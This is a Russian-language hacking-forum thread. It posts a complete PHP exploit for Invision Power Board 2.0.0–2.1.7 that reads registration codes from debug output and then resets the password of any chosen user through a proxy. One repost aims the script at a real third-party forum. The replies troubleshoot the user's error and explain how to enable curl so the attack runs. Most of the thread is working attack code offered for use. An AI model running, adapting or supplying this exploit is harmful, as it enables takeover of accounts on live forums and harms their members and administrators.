Форум АНТИЧАТ - ipb 2.1.7 -> Exploit

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - ipb 2.1.7 -> Exploit (https://forum.antichat.xyz/showthread.php?t=46518)

ipb 2.1.7 -> Exploit

PHP код:


		
			
<?php 

/* 



 Debug Mode password change vulnerability 

 Affects Invision Power Borard 2.0.0 to 2.1.7 

 by Rapigator 

  

 This works if: 



 "Debug Level" is set to 3 

 or 

 Enable SQL Debug Mode is turned on 

  

 In General Configuration of the forum software. 



*/ 



// The forum's address up to and including 'index.php' 

$site = "http://forum123.ru";



// An existing user's login name 

$name = "123"; 



// The new password(3-32 characters) 

$pass = "1234"; 



// You can use a proxy... 

$proxy = "219.11.80.65:8080"; 







// ----------------------------- 

$site .= "?"; 

$suffix = ""; 

$name = urlencode($name); 

$pass = urlencode($pass); 

$curl = curl_init($site.'act=Reg&CODE=10'); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { 

$prefix = $regs[1]; 

$regid = $regs[2]; 

$regcode = $regs[3]; 

} else { 

$suffix = "debug=1"; 

$curl = curl_init($site.'act=Reg&CODE=10&'.$suffix); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { 

$prefix = $regs[1]; 

$regid = $regs[2]; 

$regcode = $regs[3]; 

} 

} 

if (!isset($regid) || !isset($regcode))

{ 

    echo "Error: Probably not vulnerable, or no forum found"; 

    exit; 

} 



$curl = curl_init($site.$suffix); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_POST, 1); 

curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}"); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { 

change_pass($regcode,$regid,$regs[1],$regs[2]); 

} 

if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { 

change_pass($regcode,$regid,$regs[1],$regs[2]); 

} 



function change_pass($regcode,$regid,$vid,$userid) { 

global $site, $suffix, $proxy, $name, $pass; 

$curl = curl_init($site.$suffix); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_POST, 1); 

curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}"); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

echo "Password Changed!"; 

exit; 

} 

?>

Все функции правильно написаны, но вылетает ерор :( Пподскажите в чем трабл? :confused:

Цитата:

Сообщение от Serafim

PHP код:


		
			
<?php 

/* 



 Debug Mode password change vulnerability 

 Affects Invision Power Borard 2.0.0 to 2.1.7 

 by Rapigator 

  

 This works if: 



 "Debug Level" is set to 3 

 or 

 Enable SQL Debug Mode is turned on 

  

 In General Configuration of the forum software. 



*/ 



// The forum's address up to and including 'index.php' 

$site = "http://forum.nevsedoma.com.ua/index.php";



// An existing user's login name 

$name = "life:)"; 



// The new password(3-32 characters) 

$pass = "1234"; 



// You can use a proxy... 

$proxy = "219.11.80.65:8080"; 







// ----------------------------- 

$site .= "?"; 

$suffix = ""; 

$name = urlencode($name); 

$pass = urlencode($pass); 

$curl = curl_init($site.'act=Reg&CODE=10'); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { 

$prefix = $regs[1]; 

$regid = $regs[2]; 

$regcode = $regs[3]; 

} else { 

$suffix = "debug=1"; 

$curl = curl_init($site.'act=Reg&CODE=10&'.$suffix); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { 

$prefix = $regs[1]; 

$regid = $regs[2]; 

$regcode = $regs[3]; 

} 

} 

if (!isset($regid) || !isset($regcode))

{ 

    echo "Error: Probably not vulnerable, or no forum found"; 

    exit; 

} 



$curl = curl_init($site.$suffix); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_POST, 1); 

curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}"); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { 

change_pass($regcode,$regid,$regs[1],$regs[2]); 

} 

if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { 

change_pass($regcode,$regid,$regs[1],$regs[2]); 

} 



function change_pass($regcode,$regid,$vid,$userid) { 

global $site, $suffix, $proxy, $name, $pass; 

$curl = curl_init($site.$suffix); 

curl_setopt($curl, CURLOPT_PROXY, $proxy); 

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($curl, CURLOPT_POST, 1); 

curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}"); 

curl_setopt($curl, CURLOPT_TIMEOUT, 10); 

$page = curl_exec($curl); 

curl_close($curl); 

echo "Password Changed!"; 

exit; 

} 

?>

Все функции правильно написаны, но вылетает ерор :( Пподскажите в чем трабл? :confused:

Error: Probably not vulnerable, or no forum found?
мб залатали уже или ты ссылку не прально указал=)

ты курл подключил ?

этот эксплойт работаеть, только со включенным курлом, что бы его включить надо провести некие манипуляции с апачем :)

Код:

Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:



1. Качаем http://limpompo.jino-net.ru/php_curl.rar

2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\

3. Копируем  php_curl.dll в диру [you_apache_dir]\php\extensions 

4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll

5. Перезагрузи Апачу! 

6. Уря =) Работает... ыыыыыы



С Уважением limpompo.

ссылка битая, а новую найти я не смог...

Поставь апач и мускул на локал машину. Там же прокси указать можно даже. Вклюсишь курл, вобьёшь прокси и проверишь работает или нет.

А лучше скачай денвер http://denwer.ru там сразу и апач и мускул

Цитата:

Сообщение от FaR-G9

А лучше скачай денвер http://denwer.ru там сразу и апач и мускул

http://www.appservnetwork.com/ - мне этот больше нравится=\

но тама нету php_curl! =)

А что делать когда ошибка в php_curl?

вот http://flyelf.narod.ru/musor/curl.zip